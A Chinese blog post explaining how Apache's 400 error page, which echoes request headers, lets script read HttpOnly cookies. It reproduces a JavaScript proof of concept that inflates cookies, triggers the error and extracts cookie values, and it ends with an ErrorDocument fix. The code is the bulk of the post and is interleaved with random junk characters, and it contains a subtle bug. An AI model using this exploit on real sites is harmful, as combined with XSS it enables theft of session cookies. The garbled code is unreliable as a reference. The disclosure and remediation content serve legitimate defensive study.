很多程序以及一些商业或成熟开源的 CMS 文章系统,为了防止 XSS 盗取用户 Cookie,一般都会给 Cookie 加上 HttpOnly 属性,禁止直接用 JS 读取用户的 Cookie,从而降低 XSS 的危害;而本文所述的这个问题恰好可以用来绕过 Cookie 的 HttpOnly 属性。

用 Chrome 打开一个站点,按 F12 打开开发者工具,在 Console 中输入如下代码并回车:

// http://www.exploit-db.com/exploits/18442/
// Proof-of-concept (exploit-db 18442, linked above) for the Apache httpd issue
// referenced at the bottom of this post: the server's 400 error page echoes the
// request headers, including the Cookie header, so page script can read cookies
// that carry the HttpOnly flag. Kept here so defenders understand the mechanism;
// the remedy is server-side (ErrorDocument 400 / upgrade, see the fix section).
//
// setCookies(good):
//   good falsy  -> writes ten cookies xss0..xss9, each 819 characters of "x",
//                  path=/ (presumably sized so the Cookie header exceeds the
//                  server's request-header limit and provokes the 400 -- the
//                  post does not state the limit, so treat this as inferred)
//   good truthy -> rewrites the same ten cookies with an expiry one millisecond
//                  in the past, i.e. deletes them
// Detection hint: in access logs this shows up as 400 responses to requests whose
// Cookie header carries the xssN=xxxx... padding pattern.
// Note: `i` is declared by the first loop and reused by the second; `cookie` is a
// function-scoped var assigned in whichever branch runs.
- O* Z; W8 w& ?function setCookies (good) {( H, R9 t( O2 T* o# V6 z) u, g
// Construct string for cookie value
/ ^) G$ U9 i. W, T: m, z. l2 Jvar str = "";
. }1 a' N8 U% A$ xfor (var i=0; i< 819; i++) {$ X( G3 W8 y9 |: N0 v5 H
str += "x";
/ L% \2 f: g! X9 R5 J}
: T @8 }* E, n$ Q; L/ c' c// Set cookies9 b# @' R5 [$ t. L: C
// Ten cookies, xss0 .. xss9; `i` here is the var from the padding loop above.
for (i = 0; i < 10; i++) {
( \/ D! d; U& Y* M$ Z+ ~// Expire evil cookie* ]# q* b/ l, F6 \
if (good) {
& b+ U7 z7 u" A3 \var cookie = "xss"+i+"=;expires="+new Date(+new Date()-1).toUTCString()+"; path=/;";1 m5 d1 c/ g d
}& z M. y3 U4 ]' N9 a! }' f
// Set evil cookie6 c& q5 g) S$ a! E4 w; @" K
else {1 j7 ~ S- |- W7 r
var cookie = "xss"+i+"="+str+";path=/";
. p4 F, |6 p% m8 y9 b* A}
// Each assignment to document.cookie adds or replaces exactly one cookie.
, t: `2 ]! @5 _' i( fdocument.cookie = cookie;
; J/ O9 N2 k5 `7 R}7 ?) ~) |/ l. R# m% `* k) A/ q1 ?
}
// Drives the PoC end to end: pads the cookie jar via setCookies() (no argument,
// so the padding branch runs), issues an async GET "/" and lets parseCookies
// inspect the response.
//
// parseCookies is a closure over `xhr`, which is declared with var further down
// in this function and therefore hoisted. It
//   - acts only when readyState is 4 and status is 400;
//   - strips CR/LF from responseText and captures the text between <pre> and </pre>;
//   - drops the "Cookie: " prefix and every xssN=xxx... padding cookie, splits the
//     rest on ';' and stores name/value pairs in cookie_dict;
//   - calls setCookies(true) to expire the padding cookies, then alerts the dict.
// Nothing in this block transmits the result anywhere; the alert is the only output.
1 z. S, k1 l$ Z1 C' i2 Dfunction makeRequest() {
7 e" p |& }3 t) y+ O; X# jsetCookies();( L9 [$ t# r8 M: R# d5 F/ `
function parseCookies () {; z8 [4 \3 p- G6 l8 E0 ^) w
var cookie_dict = {};
) p& d( z" k+ R- p( G// Only react on 400 status
) n: \' l$ D. b' j3 S! j. Aif (xhr.readyState === 4 && xhr.status === 400) {8 o; `7 y# S: U5 v: ~3 m% M3 o
// Replace newlines and match <pre> content
// This is the core of the issue: the server's own error body reflects the
// request headers, which is what makes the HttpOnly cookie readable here.
* |1 h Q& d8 y: f* w! y8 {/ Uvar content = xhr.responseText.replace(/\r|\n/g,'').match(/<pre>(.+)<\/pre>/);
0 V* C6 \3 n% Y- W2 Qif (content.length) {. y7 [% l% z) ]
// Remove Cookie: prefix
4 t5 P8 Z9 q9 ~content = content[1].replace("Cookie: ", "");$ a7 w, n2 i; x4 ?
// Drop the xssN padding cookies written by setCookies() before parsing.
var cookies = content.replace(/xss\d=x+;?/g, '').split(/;/g);* z& w( | I: J. Q/ j; Q* R) T
// Add cookies to object% T8 O5 `8 ~5 j4 {+ ` C# y' T6 y
for (var i=0; i<cookies.length; i++) {
9 U) e2 v/ X+ [/ @1 hvar s_c = cookies.split('=',2);1 {2 a5 i7 k6 ?% B
cookie_dict[s_c[0]] = s_c[1];
( R1 D8 Z) W! E# E o; N}
" A0 H' ]/ u$ e- P' U8 ]}9 J& ~, t$ ~1 G* ?1 t
// Unset malicious cookies
2 y7 s, r$ `4 ?1 a& Q" m( UsetCookies(true); k3 |7 n8 F0 H9 J
alert(JSON.stringify(cookie_dict));
# K: W3 {5 k4 V/ n6 G3 d/ l. _}
2 c2 z. R2 v. |) w8 X}; N4 ~& Y- @. N
// Make XHR request' L- K9 h) Q" z: }4 R1 f/ |
var xhr = new XMLHttpRequest();
4 Q5 z8 o( ]6 F( qxhr.onreadystatechange = parseCookies;
$ G" B) n" [9 y2 ~7 _4 ?' Jxhr.open("GET", "/", true);# B D9 E9 y- _- r8 o
xhr.send(null);
$ N6 l: d! e) t5 T+ R}
// Entry point: the PoC runs immediately when pasted into the browser console.
$ T% x. T+ v) g0 K2 ]; r" C8 X2 gmakeRequest();
( b7 P) U' e' G0 B5 P6 H, n
你就能看见一个华丽丽的 400 错误响应,其中包含着 Cookie 信息。

下载地址:https://gist.github.com/pilate/1955a1c28324d4724b7b/download
7 B) T$ O9 t; v
修复方案:

Apache 官方提供 4 种错误处理方式(http://httpd.apache.org/docs/2.0/mod/core.html#errordocument),如下:

In the event of a problem or error, Apache can be configured to do one of four things,

1. output a simple hardcoded error message —— 输出一个简单生硬的错误信息
2. output a customized message —— 输出一段自定义信息
3. redirect to a local URL-path to handle the problem/error —— 转向一个本地的自定义页面
4. redirect to an external URL to handle the problem/error —— 转向一个外部 URL
- J1 B* K$ ~, y! W; j- d
经测试,对于 400 错误只有方法 2 有效:返回包不会再包含 Cookie 内容。
% c5 t* _; J* F, R! f: L, Y5 C
Apache 配置:

ErrorDocument 400 "security test"
; z) j5 @' [! d) Y
当然,升级 Apache 到最新版本也可以 :)。

参考:http://httpd.apache.org/security/vulnerabilities_22.html
! y" W% X- i% n o: w2 q
5 e, h+ m, U* E4 {4 }# V |